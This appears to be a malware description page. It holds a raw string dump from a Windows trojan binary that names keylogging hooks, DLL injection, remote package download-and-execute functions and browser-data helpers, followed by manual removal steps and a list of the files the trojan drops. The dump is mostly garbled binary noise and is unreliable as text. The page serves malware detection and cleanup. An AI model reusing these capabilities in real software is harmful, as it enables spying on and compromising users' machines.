ZkkdDocjn^g-4,o.ye

^ioM-3,iiziGmwItI.cG

\h-2,Jfal\`dgxj-4.DZ

,-\ T,/.Om

Hokk,.`h-1-.,eh`mgsk`gsk,.bhk-2,h P,z,.c-4,g-2,rt4,..b,n

hcl.sf

 U -,yfse,.ft;:/*,--1,jcd-1,jdy,.ft,-``s,-.yR

wt-3,xkszm` Q,lq T,N](bn-1,( V,IEM]^M]VSKFP^[[ASR[kgz-4,eskT V,:,.igbk-0,w Q,javdm-1,hx,.-2,jekz TS,FCAXQKQS\MJUQ]WD\TWnh-1,s`-1,mXVa-4,25=:Jnjm V,/-C D

webqskv`T-Y

oj-2,`ac<<*kcb.jo

ak-2,`ob<< T,jcb.je

Bng`Rveoi-2,dbhunhLj-4,dnk SUQ,kbho(-4-,,lnemfjo,,u`, -1,s`hir-1- 1,sj-2,enzx`x/zydznh Q,bnxi`o-4--,/d-3,ejy,,b`-3,`e/ii Q,kb-4,sz-0,xdk U.Fl

Pjzkef(]-2,lkfvmfg-3,c-1,gkl(caa`ojk-0,c T,ui-2 T,aibhgl,.sk-1,fkw-1-.,fga`c R,a`mvaopgl,.bkz-2,p,,.c T

IN]JVN]K]KJ]B]F^UF@@]\v-2,ujbRBjazsnc^s`lkr-1,`-1,].jl

1.2.3

THttpTimeOutThread

THttpCallBackShell

Gx-21,\igh]ixyj-42,M.DJ

A`qjz``-0,ZkdkNgij.pc

Kcqjpc`-0,Aaj-1,gEdafa`.pM

Jmvgknm Q,2,,<,./accwcxgeni5 W,O_GB R,=>)27,.Pkbjhu-4-.,IV,,8)37,.Spejblx Q,2,,< W.g W

TPipeServer

TPipeObject

TPipeServerListener

TPipeClientU

isrPipe

@altc T,Bnc T,Bdrab Q,mw,.rap,.uk>,. N,D

Ecezcb-4 S,Tmeic6.fA

Bc/K-33,`-1.jG

Jbhblnrefc V,H-0,bv-1,li.AT

Uju-0,c-2 W,Ht-2,h-4.Rq

Ijv-1,h-0,jm Q,Jq-1,n-2,/,.u`l,.lnmw Q,ll`oj`zh`m-2 Q,xjzi`vz Q,kbz`.^l

Q-0,iznjib Q,`u,.tgu-0,qyi-1,ulb.a-F

Ob-4,/dcdzfe, kh-3,`/r-2,jld.vL

V-1,ns-4-.,hx V,lmdeehea,.mdhi Q,hi`onezhdh-2f.a

ebP-3,dLfnda`-4,`yj-4.PL

Vks-3,mkqi`,.Aehk W,_mtb6 T.B_

Hlcc U,iezkaela,--3,ewhki U-3,ohh-3,*yj,-hh U,kxb-4,hd,-,-`e-4,`,--3,edc*.UP

Ibs-1,htrgb W,uz`dm,.enumnqc-1,dc VSQ,uc S,ehq`mhgjdc V,znh V,ctdn,.efro/ W,Aahia,.uh V-1,dtross V,zib V,jnphbnfb P,/).a,q

Bdah T,lxyk P,nae-33,dbdhi T,l-3,7 T.XO

Mooanj V,zygrh, zi,-j,.`dgk VU.Qf

Mdyke, -4 U-2,ev`,.e-4 U,`ikdzez` R ,-3,`-2,ixl`k,,qa,,v`-1,c,,(,.xdl-2-,,od`,,``oh,,ka-0-,,qa,,ndj,,xmgbkv P,\.I

Zorqo,.ug-00,bq-3-.,nedaugn RW,qo-1,qgx-2 W,uczom-4,z W,J^ZW R,Xoieo,.twz-3,hp-3-.,pkfb W,ak-0,tg*jhudbhcn,.ugyzfp-3 PW.e

Hg`jnj,.-0,nw-0,lxr,.`lha-0,nb R,)fs-22- ,dk)bh,.Mdq`edgj)fijl U-S,k

Bo`hdbbboi,.-4,ik,.ony`gnoj U,/ P.9\

Spb-3 V,qzbtgj,-ol,.Nnw`fu R,Clv R,jd`dk-4 V,d-1,bk R,zec R,accq,.-2,tmxdbgj QV,kicipgca R,zec R,Mesle-3 V,Oo-2,< R.Y V

Mhv,-Pbt-4,`h Q,nqh`yfi,-,-v-4,m7 S.LN

Janyjnkdyfij S,XncJAby S-1,b-3,pfhc S,gfcgcb-3 S,ifdojc,,.Rn

Vkszmkqm`,.Kiwz*Ekjnnmkc(lkfla-1,=(-<._

, ,--:,[

\kj,.zf-30,mp-0,kl S-2,ofdj,.imk,.xq`xagjj(lak(gfhnf-2-. P.j,8

Nmgk[mqk(qekptnm-1,ao,.klj`oa W .,gho,.-3,eg-0,m>, .f,H

\ekvynmzlo,.-1,lxkz)dh,.-2,ck,.obbk)xgtl W .,gnea-1,lo5,.-0,n-23,fe-2,k)ckomn-1,4).i4

Zol W-2,h-1,umb)cabz W,`h-2 W,ff-4,b,.uhiib)t-0,wyh-1,s)*,.nniaulc,.uhiib)ukv-1,b-2,s W,y-3

L_LCUNTF, KHC.op

0.0.0.0

3?:96=>?59:;.ZQ

6?0N2=.Lq

;768>1-80

cabinet.dll

\fgejnhg,.Dhr,.f-3- ,z`b, -2,gbyz,..8y

000000000000

Xkzlxz*jy,.-3,le,.fldi VS,no-3,b*ycof,.hf*bep-3,5*Qo-3,Im-3,4*:.e

 ;7.Q,>N-Y,[ T,Tc.Uv

 Q .,Y-1,a4,,.gh

K`o-0,Kebj,--0,o-1--,iv-04,mm-0,hh,.i-4,cc/NE] S --3,k-1,x`z5.yH

Y]H.if

d-3,tdcQqdc.Lb

)hix.CB

Dg`c_-1,clj-24,5/eiv2.wj

ch_strtup_urls

,.Fqmz S,_ebvl>,.I>

]DKizHi-4,exc-1,Hc`hk-3.GI

Mhcn`mhh,.qv/obrj-1 T,vnmoghkw( QP.q,N

G`cojehi T,yv,.gck-3,hirk U.a?

CJ[hx.Xu

_.Wo*BC-T5p7d.V-b,

(/tdolb,-`ahyiju,-rjdyh`i,-vfse Q-0,oh Q-1,f`d/illj W,lm-2,blev W,knzii/.Rl

Gfrhba`)c-2,h-2,gxe-0,z(F-1,`lhl,.zaz-3,gjzk(,,``nk3,.-IC

NAER_[URNDT].Lw

Gotqomkdzhhk,.bhkhhuhke)W N

Uctaur T,cfoj,.wgvoj< T._,g

Gdd`ceki T,Ek-2,pmiba-3 U,@ea`,.vit-0,a-4,q,.smv,.`ikgah U,jqi U,zk,,iogg U,ab,,U-1,mzlbak`,.Icak*.`?

CdyzkffkxDkco*kb-3,oxkn*kh-3,ox,.k-3,*bokyz*edk*xo-3,ex-3-.,kfxkkns,.yodz T.e-_

LJ_.ge

fxk S,Cym^rk.Um

Ulegdjc,,clo``i*,,`-4,tcw7 V.AP

ole32.dll

MAPI32.DLL

LeftPopup

,.Ggazb2.s-c

,.gyxap, xokxoj,., -2,gvc*cgxyoen*4 R-`-.

/`gx/-2214,azxjj.Cj

olepro32.dll

IWebBrowser

IWebBrowserApp`

IWebBrowser2

TEWBWindowSetResizable

TEWBWindowSetLeft

TEWBWindowSetTop

TEWBWindowSetWidth

TEWBWindowSetHeight

bstrUrlContext

bstrUrl

OnWindowSetResizable

OnWindowSetLeft4

OnWindowSetTopl

OnWindowSetWidth

OnWindowSetHeight

grfKeyState

TComTargetExecEvent

CmdGroup

nCmdID

nCmdexecopt

hhctrl.ocx

URLMON.DLL

SHDOCLC.DLL

rcmDefault

rcmDebug

DontExecuteScripts

DontExecuteJava

DontExecuteActiveX

DisableUrlIfEncodingUTF8

EnableUrlIfEncodingUTF8

CheckFontSupportsCodePage

DisableSubmitUrlInUTF8

EnableSubmitUrlInUTF8

lpMsg

PMsg

pguidCmdGroup

TTranslateUrlEvent

pchURLIn

ppchURLOut

CmdID

pszUrl

pszUrlContext

szPassWord

ErrorUrl

OptionKeyPath

OverrideOptionKeyPath

OnTranslateUrl

OnCommandExec

'%s' is not supported.

TMsgEvent

TKeyEventEx

Port

Password

poPortrait

OnKeyDown

0.750000

3333333

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(

This object does not support this method (

Unsupported type for Parameter with Index %d

Method call unsuccessful. Object: %s, Method: %s, Exception: %s , Source: %s.

hXXp://

hXXps://

B])i-2,`j-0,aag/-0,wgl U,kqjk-02,fg`)iigejl,.-3,f-1,f)bm-2,znok3/.tc

Gdxfbcj W,DY,.bxo`s,.iokbhode0,.-3c

L\, hpjey V-2,n`iyni</.Vq

A`bfmv(wwrm S,oll S,Ktmmz R,fbcg(`olflz R,jf,.gesz-0,(pzpamiq2 S,8,.

eiOnKeyDown

eiOnKeyPress

eiOnKeyUp

OnKeyUp

Handler with EventID = %s already exists.

Error on IConnectionPoint.Advise

Source don't have connection point for [%s]

YR-0,xh]izn.cQ

2.1.0.0

This exe was created with an old version of HtmlAppMaker.

Ekcjfn*rl*fgvdin S,b-3,ko_C V,exek S-3,bc S,lejoe-2,omm*sqf0 V,j-X

-0,cnyzgcEi.Tc

Qwgfc T,jmfqi(mjdmgpggj T,hzki,.kkjhac T,haha P-C,D

https

Sf[.t,T*.lJ,e

Bfh U,Cfk`,.jgd`nja,.-2,`?,._-S

Hoe V,ea-4 V,xfdq, zcc, ^yil-1,nux,.miyc, ub`hc, g-4 Q,x,.jjykjbr,.yse`bhl P,k.f

MSGALL

Clri,.ancjdoe,.ksmc,-gkbh Q,jo-3 Q,dodmgj QQ,dgad8,. Q.Y

irsoMsgDialog

irsoJoinPath

irsoGetCmdLineParam

irsoGetCmdLineCount

irsoGetCmdLineIndexOf

irsoGetCmdLineParamValue

irsoGetCmdLineAll

irsoRegCreateKey

irsoRegCreateKeyTree

irsoRegDeleteKey

irsoIsRegKeyExists

irsoRegListKeyValues

irsoRegListKeyKeys

irsoRegSearchKeyKeys

irsoRegCopyKey

irsoGetRegKeyInfo

irsoHttpGetData

irsoHttpGetDataInThread

irsoLibraryExecuteProc

irsoLibraryExecuteProcW

irsoLibraryExecuteProcWithResult

!irsoLibraryExecuteProcWithResultW

irsoExecute

irsoExecuteDllInProcess

irsoSaveExecuteUsingCMD

irsoIsMutexExists

irsoCreatePipeServer

irsoStopPipeServer

irsoSendDataToPipeServer

irsoSetDebugLogUrl

irsoGetDebugLogUrl

irsoGetWebBrowserHandle

irsoGetCurExeCheckSum

irsoGetExeInjection

TExecArgs@

iubnyybRolkanldf.RW

b-1,[-1,e.Hv

.html

H-4,njBdi-2,o-4,r.vY

-4,fhxXahcxgw.rg

gghYcjrf.ae

jehGbeags.qB

PIPE_DATA

PIPE

LNYCD_^.eP

HMVH9>.PE

\gld-2,vyt,.gey-10- 4,kod-0,kf1,-Fvfa[K, O-1,m-13,kp, blhnnz U,x,-GG<,-hcgalchf,.q-323,myy,.kx,-`m-1--,kljobgo S.V..

F-1,`b[A,-L-1,gz-2,kz,-albhmz/-3-.,GM:,.hiabline,.ia-1,kiiw,.ld-2,ojakj V.h-C

-3,1 T-1,`-4,b-4,w37 P,abov=.vN

irsoExecutePackage

irsoReportPackageError

irsoReportPackageSkip

irsoReportPackageQuit

irsoReportPackageSuccess

irsoReportPackageInfo

irsoGetPackageFilenameFromHttp

irsoGetPackageExecExitCode

irsoGetPackageExecResult

irsoGetPackageDwnldUrls

irsoSetPackageRelProgressShare

irsoGetFireFoxEXE

irsoGetIEEXE

irsoGetChromeEXE

irsoGetOperaEXE

irsoGetFireFoxVer

irsoGetChromeVer

irsoGetOperaVer

irsoUninstallAddExeCmd

irsoUninstallAddOpenBrowserCmd

irsoUninstallAddRegistryKey

irsoUninstallExecute

irsoReportStart

irsoReportInfo

irsoSetExclusiveExec

isroSetReportUrl

-11,jycmjaOaahDgvyc-11.Pg

Pfc V,potaaz V,`k-1 V,g T-2,nivzesp,.ou T,`ir T,k-3,owz< V,f._

zfc.bz

]no^dun.Vx

\fuj-1,w U,P\O U,qah`k,.nlvcbqff,-U>

\GCAPMA][.oj

Fvonszedm,.ojvid-4 S,ydnm,.ojob,,-4,l,.,.oobMyfAjmf-14,Glohng,, P  ,F-13,dq4,,.7^

Lukkyyaag,-ko-1,j`z)z`kg,-koea(zf,-*jeaA-2,HcqAokm-1,[hijp/ T .,L-4,za-0,7(.cT

Apmft-1,glj(mbqofw T-4,ffj(mbhd,.wk(,,ghd]kk-4,Aebm-1,p VT .,Fvzaq>(>-9

AAjcM0WrUSlfbBR5EtcPS6EMoD3wF3FKlaGHXQ0Ox4qre4LUBQYa0/SWyvZ26RV14TwPpmqepAntqZ6qJId/PBwcgibQr7vwIboNrrDj5AVp/wPGGHVmiZst7cluh/ViMeGGMZAAz7lGwPsuLdz12JDqfbhN9grpmVeEBOQxUqj5qNawTJR9SSe3w8tDp7AEEHgTSs xWrpFPMj

Mgsejf Q-2-.,dihj(@-12,aig,.-4,o-2,fgs-2-.,is-2,fmh-2,gkg-2,ggh)em-4 W .,]ul,. W,Blcg@-12,aig,.njhi(i-0-.,noeb(OZQAEVH]U@AFYZZZYH[\NVEM_)yara,.-1,nl,.ccp,.(qagkn)-3,zi-4,glcm,.j-4,)wgs-0-.,ieja-2,h-2-.,eggooc-0KC

Ukszv.ra

Ool,-x,.kdezkk`gxo,,zjo,,glyxonfi-1W.g

]k-4,vfk-2,ak,.HLAB1 T,K.j

Aczgv7,.FanbkjhAdbh-1,*,-,-^cvlcq>VS,. T,IbnWyova7,..O

Baezgjc6,.JatzKbjkv,, URT,fimeq-4,k T,SilGkbzembkv T,bap T,m-2,wmk`a`,,av T,HbhWxopa23JkAavaChba-32,( T,HbhWxopa6.?,N

Gozgp;,.KlrzcnmAddd-1,q*(,.Rcsooq;U_,. B

Itdj-1,xn`b,,dnyko-0-,0,ojb,,dn`` W-0,c,, U,k``D`bjn-2,aEi-1,xmkci-3 US ,,Iu-2,c-3,=/.rG

Narky5 V,In-0,IhmjtMj-4,rgdaG VR,/Voynk-2,1TEo-0,Mshm2.av

Ihhht,.-3,lak,.Ng-3,zdi`,.-3,cz,.yi4,..Ya

H-1,ug-4-.,p`h` W-14,wnfj,.sg,--2,b-1--,aanh-1 P-0--3,foh,.di-2,zngc4 W-<.h

K-3,gi-3,rmc` V,gm-0,alx,.qli` V,gmbj T,xa VV,hbjCizEq-31,IbjktRmbsa-4-,,* T,I-1,tk-3,4 V.?,n

[nzwaei S-1,ck S,gmhfzx,.aihedzd-0,ml, zl2, >.3

_g`oeli, xg-1,felo-4,em`, -4,kiemn,.-4,c R,zci R,cjel,.-4,dpkjh,.,.cmljgi8,..9.,

Rmbaop,.mowzemhophk` T,djmktjzasaj T,umca,,k-0,p/ T,]kla,.t`geefa-2 T,lmilu T,`ku T,ladj,.mowzemhk`NA

1.2.1

inflate 1.2.1 Copyright 1995-2003 Mark Adler

deflate 1.2.1 Copyright 1995-2003 Jean-loup Gailly

?456789:;<=

!"#$%&'()* ,-./0123

TBv}.Bv

333333333333333333

33333833

3333339

3333333333333338

:*"*"$3338

33333333

33333333333

3333333333338

33338?383

333333333333

:*3:"$3338

333333333333333

%up2N

%C}(BV('

F=.qn

ÖI!

5IØ

4K×M*D8

ÔL*

dN%CgM/

G0I%D=

RT.dJ

~=kEY

5/x.fR

T.Ri[

{'{.6`^(

-%f)k

J_.Jc5

%5U"r

ZU.bHt

GetProcessHeap

GetCPInfo

RegQueryInfoKeyA

RegOpenKeyExA

RegFlushKey

RegEnumKeyExA

RegDeleteKeyA

RegCreateKeyExA

RegCloseKey

SetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MapVirtualKeyA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextA

GetAsyncKeyState

EnumWindows

EnumThreadWindows

EnumChildWindows

ActivateKeyboardLayout

GetKeyboardType

"$ %),'8

38000=344

4? 3!0 3!6

H.JXA

&)"%&$&'&",,/- '

1 0 .'7(2':

- /*-( ,'.-!$$$&'('/*) ,*/.)*72-7)

944(@32%2u8

.PMDF<7I

.idata

.edata

P.reloc

P.rsrc

H.JXA0Db

SOFTWARE\Microsoft\Windows NT\CurrentVersion

errorUrl

\bin\SubWCRev.exe

OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters

Clipboard does not support Icons/Menu '%s' is already being used by another form

No help found for %s#No context-sensitive help installed$No topic-based help system installed

OLE error %.8x%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic

Unsupported clipboard format

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Error reading %s%s%s: %s

Failed to get data for '%s'

Failed to set data for '%s'

Resource %s not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file %s

Cannot open file %s

External exception %x

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid GUID value

I/O error %d

Integer overflow Invalid floating point operation

mshta.exe_3704_rwx_079E1000_0004F000:

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

EVariantBadIndexError

u%CNu

.Owner

TThreadExecuter

^ioM-3,iiziGmwItI.cG

\h-2,Jfal\`dgxj-4.DZ

oj-2,`ac<<*kcb.jo

ntdll.dll

SQL error or missing database

An internal logic error in SQLite

Operation terminated by sqlite3_interrupt()

Uses OS features not supported on host

2nd parameter to sqlite3_bind out of range

sqlite3_step() has another row ready

sqlite3_step() has finished executing

Unknown SQLite Error Code

sqlite3.dll

ESQLiteException

TSQLiteDatabase

TSQLiteTable

Error executing SQL

Could not prepare SQL statement

Error executing SQL statement

Could not prepare SQL statement

SQLite is Busy

Kf`, -1 W,hefc,.cxb`,,juoocbz,,.I,x

TRealSQLQuery

TSqlBrowser

TBrowserChrome

,.AAGGY(-].Y

 UV -,cu/ U,dh-1,ySljt1 U.Hr

-4,k`hoz,,.Wg

,.jjb,.hvco-4,mi`Tqrm59d.9

3333333

 V,ACAOY*.EQ

G`x-0.vz

Daj`d,.Zd-1,z`oo-2,URgh-2,vi-1,l]Egjsg-2,fg-1,R^hfjfv-0,RJtz-1,lo-1,Xls-0,gfoTOyqKaguiggdzRZug-1,hfmRdhk-1,frgh-2,/egjsg-2,fg-1,kmfmQ1vmepc;j1cjyl]Kf`ml-1,lo I.c

_-3,d.SE

KWindows

XisrWindowsEx

YisrUrl

isrOperaUtils

isrChromeUtils

kisrSQLiteTable3

isrSQLite3

isrSQLiteUtils

GetCPInfo

RegOpenKeyExA

RegCloseKey

GetKeyboardType

.idata

.edata

P.reloc

P.rsrc

.imeJ

SOFTWARE\Microsoft\Windows NT\CurrentVersion

%s.Seek not implemented$Operation not allowed on sorted list

Property %s does not exist

Cannot assign a %s to a %s

Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file %s

Cannot open file %s$''%s'' is not a valid component name

Invalid property value List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Error reading %s%s%s: %s

Ancestor for '%s' not found

External exception %x

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid variant operation!Invalid variant operation ($%.8x)

Variant is not an array5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value"'%s' is not a valid currency value!'%g' is not a valid date and time

I/O error %d

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:1900
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Roaming\Imminent\Logs\27-07-2017 (608 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\svhost.exe (691 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FolderN\co-re.exe.lnk (943 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uTorrent.exe (148 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\shell_scripts\shell_ping_after_close.js (312 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\es.json (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W4I10VCX.txt (89 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\common.js (349 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\index.hta.log (26 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\yandex_horz.png (8 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\shell_scripts\check_if_cscript_is_working.js (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\3rdparty\FS.ocx (965 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\loading.gif (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\uninstall.hta (575 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\initialize.js (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\uTorrent\settings.dat.new (73 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\ru.json (9 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\utt8A15.tmp (0 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-732923889-1296844034-1208581001-1000\1f91d2d17ea675d4c2c3192e241743f9_88dcd395-b062-45b3-a6cd-79f37c0eba08 (105 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\main_utorrent.ico (107 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\br.json (6 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\styles\installer.css (587 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\it.json (6 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\3rdparty\FS.dll (933 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\uninstall.js (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7NMBDULB.txt (89 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\ko.json (6 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\logo_Yandex_RU_UA_vertical.png (6 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\de.json (6 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\search_protect.png (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\shell_scripts\shell_install_offer.js (7 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\install.1501130078.zip (281721 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\index.hta (739 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\es5-shim.js (11 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\yandex_horz_ru.png (7 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\main_icon.png (4 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\install.js (15 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\pt.json (6 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\en.json (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\styles\common.css (102 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\fr.json (6 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\main_bittorrent.ico (103 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\bt_icon_48px.png (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\yandex_browser_setup.bmp (204 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\BE.locale (256 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\DE.locale (161 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\browse.css (337 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HU.locale (172 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\bg_test_B[1].png (4277 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ES.locale (150 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\NO.locale (148 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BCAA.log (8 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\RO.locale (156 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\LT.locale (166 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\PL.locale (155 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ML.locale (360 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\FR.locale (163 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\bootstrap_30396.html (156 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006CD9A.log (8 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\EU.locale (161 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\FA.locale (186 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ID.locale (157 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\BS.locale (159 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\3B1DE5F8_stp\asgnd.json (6341 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\KK.locale (218 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\RU.locale (266 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\YO.locale (146 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\VI.locale (180 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\images\progress-bg2.png (978 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D8501957525981.dat (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TA.locale (330 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\UK.locale (255 bytes)
